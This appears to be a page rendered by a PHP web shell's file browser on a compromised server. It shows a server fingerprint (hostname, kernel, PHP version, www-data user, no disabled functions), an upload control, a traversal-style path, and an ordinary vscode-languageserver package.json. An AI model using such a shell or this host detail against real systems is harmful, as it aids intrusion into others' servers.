( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/tmpr/../tmpr/../tmpr/../node_modules/vscode-languageserver/package.json
{
	"name": "vscode-languageserver",
	"description": "Language server implementation for node",
	"version": "7.0.0",
	"author": "Microsoft Corporation",
	"license": "MIT",
	"repository": {
		"type": "git",
		"url": "https://github.com/Microsoft/vscode-languageserver-node.git",
		"directory": "server"
	},
	"bugs": {
		"url": "https://github.com/Microsoft/vscode-languageserver-node/issues"
	},
	"main": "./lib/node/main.js",
	"browser": {
		"./lib/node/main.js": "./lib/browser/main.js"
	},
	"typings": "./lib/common/api.d.ts",
	"bin": {
		"installServerIntoExtension": "./bin/installServerIntoExtension"
	},
	"dependencies": {
		"vscode-languageserver-protocol": "3.16.0"
	},
	"scripts": {
		"prepublishOnly": "git clean -xfd . && npm install && npm run clean && npm run compile && npm test",
		"postpublish": "node ../build/npm/post-publish.js",
		"compile": "node ../build/bin/tsc -b ./tsconfig.json",
		"watch": "node ../build/bin/tsc -b ./tsconfig-watch.json -w",
		"clean": "node ../node_modules/rimraf/bin.js lib",
		"test": "node ../node_modules/mocha/bin/_mocha",
		"preversion": "npm test"
	}
}